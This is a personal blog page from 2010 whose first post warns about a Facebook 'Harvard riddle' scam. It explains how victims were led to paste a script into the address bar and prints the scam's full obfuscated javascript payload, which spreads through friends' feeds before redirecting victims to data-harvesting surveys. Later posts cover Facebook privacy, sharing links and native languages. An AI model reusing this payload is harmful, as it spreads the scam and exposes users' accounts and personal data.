Navigation





About Me

Narendran C R
London, UK
Follow me
Linkedin Facebook Twitter Youtube Blogspot



Wednesday, April 28, 2010

Facebook XSS attack - Only 4% of harvard grads can solve this riddle...

Recently I saw one of my friend "Liked" the Page "Only 4% of harvard grads can solve this riddle..." on Facebook. He is one of my good friends who I respect a lot and I know he is not very active in sharing information on Facebook. Obviously I was tempted to visit the page and more over I like solving puzzles and with the title "Only 4% Harvard grad"!!! no words to explain.


First page had the question and I started reading... When reached half of the question, I started thinking of various answers!!! Snow? Air? Storm? Fire?!!! Blah Blah Blah... and when I finished reading the question, the answers in my mind was contradicting each other. May be that is why only 4% of Harvard grads could solve this! I thought. Until now I had no second thoughts.

When I moved on to second page it asked me to press series of keys. I started feeling suspicious about it. It asked me to press series of keys, first press and hold "ctrl" key and then "c". Almost every one would know that it is shortcut to copy something and I know it will not work out for me as I am using Apple Mac machine. I just followed the instructions...

1. Press ctrl + c (copy something... but what the hell it is copying!!! I did not select anything)
2. Press alt + d (Haaa! this neither works in Mac. It is go to the address bar command for windows... but still I dont know what is supposed to be copied but I am now sure it is a bogus)
3. Last step ctrl + v and press enter (Ta da.... Ultimate goal reached..... I am 100% confident it is some sort of attack)

Now I am more curious to know what kind of attack it is.  Immediately I switched over to my windows machine and made sure that I was not logged in and visited the Page "Only 4% of harvard grads can solve this riddle..." as instructed I copied the content but didn't paste it in the address bar instead used textpad to analyse the content (typical software engineer ;p). I didn't want to spend much time in interpreting it as I was in middle of documenting my dissertation. Smartly thinking (:D நானே சொல்லிகிட்டா தான் உண்டு!!) I concluded that the javascript will post a message in your wall that you like the page and your friends can see and become a victim :D. If any one want the script see below.
/************** Javascript ******************************/
javascript:(
function()
{
    a='app112010525500764_jop';
    b='app112010525500764_jode';
    ifc='app112010525500764_ifc';
    ifo='app112010525500764_ifo';
    mw='app112010525500764_mwrapper';
    eval(function(p,a,c,k,e,r)
        {
            e=function(c)
            {
                return(c35?String.fromCharCode(c+29):c.toString(36))
            };
            if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);
            k=[function(e){return r[e]}];
            e=function(){return'\\w+'};
            c=1};
            while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
            return p
        }
    ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
    d=U;
    d[e[2]](V)[e[1]][e[0]]=e[3];
    d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
    s=d[e[2]](e[6]);
    m=d[e[2]](e[7]);
    c=d[e[9]](e[8]);
    c[e[11]](e[10],I,I);
    s[e[12]](c);
    C(D(){W[e[13]]()},E);
    C(D(){X[e[16]](e[14],e[15])},E);
    C(D(){m[e[12]](c);
    d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);
    ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B| true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))
}
)();
************************end of scrpt**********************************

Wait... still the attack is not complete. The motto of this attack is not just getting visitors to the page. It has still not revealed the answer!!! in fact there is no answer to the question. It will ask you to take a survey and redirect to different survey pages like "prizes .uk .com", "rewardstoday .co .uk" (Intentionally left spaces so that you don't become a victim :p) where you will be asked for information like your email address, name, phone number etc etc and even you credit card number :D.

Any way there is no answer for the question so you don't have to worry thinking about it...

There are already about 87,223 Victims and we don't really know how many of them gave out their personal information or credit card information!!! and each time when I hit refresh it is increasing by at least 50!!! I realized the potential of social media...

Now why did I write this blog? hoping that this might educate some people who really are innocent and might become victim.

What we can do? Visit the page "Only 4% of harvard grads can solve this riddle..." scroll to bottom and report this page so that we help taking these pages down.

Thank you very much for taking your time...

Monday, April 26, 2010

Is Facebook acting Up? or Is the Like Button so powerful?

Few day ago, suddenly I started getting news feed from FunCage.com for which I never subscribed. How the hell am I getting these news? Never mind... the postings are funny and interesting.

Yesterday I started getting new feeds from "Thank you Pakistan for taking Sania Mirza, Now Please take Rakhi Sawant also :)". All I did was just clicking Like button on one of my friends status. Is this link button so powerful that we automatically get subscribed to these community pages?

2 days ago, when I opened my Facebook account, a message popped up saying that all the schools in my profile info will be shown as a link. This looked interesting as it is easier to know more about a friend in Facebook. At the same time, I saw some new notifications icon flashing. This is where I was surprised! a message which I had already deleted was back to my inbox. How is that possible? How am I getting news feeds which I didn't subscribe? How is the message appearing back that I deleted? Is this related to some new changes that they are pushing it to Facebook? I don't know! Is Facebook acting up? I am confused! if you know the answer please let me know.

I realized one thing, we are so addicted to these social network sites and share our personal information which might affect our privacy. May be we are not worried about it now, but we might be the victim in future. So be wise, know your privacy, be aware of what you are doing and what are the consequences.

What ever it is! I love these social networking sites... its lot of fun and informative as well. It is just how you use it. :D

Thursday, April 08, 2010

Stop Forwarding - Start Sharing

Email era for forwards has changed now.

I used to get many forwarded emails and if I find it interesting I would forward those emails to my friends. I always have this habit of spending a little extra time to organize so that it will help me to save some time. In past I used to build email forward list to share emails that I receive. Later at some point I started creating groups which seemed lot more easier to share relevant information with my friends.

Recently, I started sharing links instead of forwarding them. This seems to be very convenient for me, but I still see that many of my friends forward emails to share information, hence I thought, I should write this blog to spread this information for my friends to stop forwarding emails and start sharing links.

Now a days it cost zero for us to host files in Internet, the only thing is to get started. I use the following services which is free and you guys also can use it wisely.

To create websites / web pages - blogger.com, weebly.com
To save and share documents online - googledocs, adrive
Social Networks - Orkut, Facebook, Twitter, Digg
Professional Network - LinkedIn
To upload video - Youtube
Live Videos - Ustream
eBooks - Gigapedia

You may think "Why should I do this?"
I had many times hesitated to share some information as it is going to cost me some time to upload or download files and share information. Now you can easily share information on the go using simple share tools.

You would have noticed in almost all site nowadays the share link to many sites like Facebook, Twitter etc. You can use any of these share, for my convenience I have installed Google toolbar which allows me to share information by simply clicking on the share button.

This will neither flood your inbox nor eat up your time. Also if you receive an email and if you feel it is worth to share, please take few minutes to upload it in Internet and share the link so that it will reach more people than the email network.

These are just my thoughts!!! it's up to you if you want to spend little extra time or not.

I have shared some of the common website which I find useful. If you have found any websites very useful, please share it with me.

Thanks in advance.

Sunday, April 04, 2010

Thinking in Native Language | சொந்த மொழியில் சிந்தனை

It was a wonderful Easter I ever had. My dear friend Anvesh invited me to his house for lunch and promised me Hyderabadi Biriyani. After going to his home I realized that I was the one who had to cook Biriyani! (just kidding, but I helped him in cooking).

Any way it was a warm welcome with parota and mutton gravy as a welcome snack ;) and he started cooking Biriyani. Later his neighbour uncle made an entry with his sister friend :) Uncle is a Pastor, he greeted me and continued his work. Mean while, Anvesh opened his laptop. Laptop while cooking! what would I expect? A good music to enjoy while cooking! yes, he opened you tube and started playing a video (I was expecting his favorite Vadivelu comedy) . Ooppsssss video from vahrehvah.com,(பயபுள்ள இப்போ தான் பிரியாணி செய்ய கத்துகுறான்) he started playing the recipe video. OMG $^%&*^($^*%^*& I yelled at him. Last time when he brought Biriyani to my house, he told that he cooked it. Now came out the truth, it was his cousin who made awesome Biriyani and this idiot took the credit. Eventually I had to jump in and help him and finally it was nice spicy Hyderabadi Biriyani!

After all Biriyani is ready (WE COOKED it Lol...)and we need someone to try it, yes! neighbour uncle :) We invited neighbour uncle who should be in his 60's and his friend who should also be in her 60's too. All we did was to invite them, they ate to fill their stomach and heart, nice to know that someone liked Biriyani that we made :) but later came the thunder! Uncle started his preachings and surprisingly Aunt was talking more than Uncle. She is Singapore Tamil settled in London and when she came to know that I was from Chennai, she started talking a lot starting from when she came here.... blah blah blah.... Finally with my actions and gestures, I was able to convey that I had to leave and escaped from that place.

Now why I wanted to blog this stupid story? One reason is to thank Anvesh for the beautiful lunch. Secondly, lady's blah blah blah... she said that she had met many people who come for preaching and is comfortable reading Bible in English despite the fact that their mother tongue is Tamil.

We had this small conversation... (Ooops even I am not comfortable in reading Tamil, I have to cover up!!!) (Englishல மட்டும் superஅ என்ன!!)
me: started off with usual reasons, we studied in English medium and Tamil was just one subject.
Uncle: padded me saying that he finished his Masters in English Literature and so blah blah blah...
me: Tamil is confined to tamilnadu... we wanted to learn more, Internet blah blah....
lady: Why do you say that I have seen many people using Tamil in computers!
me: (Just to cover up) doing Masters in Computers and we can't do much in native language so we have choose some language which is globally accepted (English may not be globally accepted but enna panradhu??? cover up cover up...)

Somehow covered up and escaped from the place.

Looking back at this I realised that I don't really know any of the languages properly (எதுவும் உருப்படிய தெரியாது) and also had these questions in mind.

1) What is the scope of our native languages like Tamil / Telugu?
could be in their own states! but what about people who stay away from home? who migrated to other countries?

2) How many people are learning native languages?

3) What can we do to protect it from extinction? (may be this is too strong, but at least it is deteriorating)
Forcing people to study in native language?
benefits for learning native language?
educating people that education in native language is good? may be not! would I have reached this stage if I had my education in native language? may be yes! or may be no! I don't know.

4) What can we do to make people to stick to local language?
Making everything available in local languages? is it possible? is Wikipedia available in all native languages? can we write codes in native languages? can we write chemical formula in native languages?
Blog in Tamil? (something that I could have done now... but why I didn't do? I am not comfortable in writing in tamil, not all my friends know tamil, whom I might be expecting to read this blog!!! (தமிழும் ஒழுங்கா எழுத வராது! என் நண்பர்கள் எலாற்கும் தமிழ் தெரியாது)
Guys try using this "type in tamil" tool its really cool :D
If this can be translated in any language I wouldn't mind blogging in tamil!

5) Do we need to stick to local language?
Its up to you...

This is just a thought I had in my mind today. If you want to discuss you are always welcome. Comment below and we shall have interesting discussion and also we can see that if we can do something good.

Thank you reading this Mokka Blog :D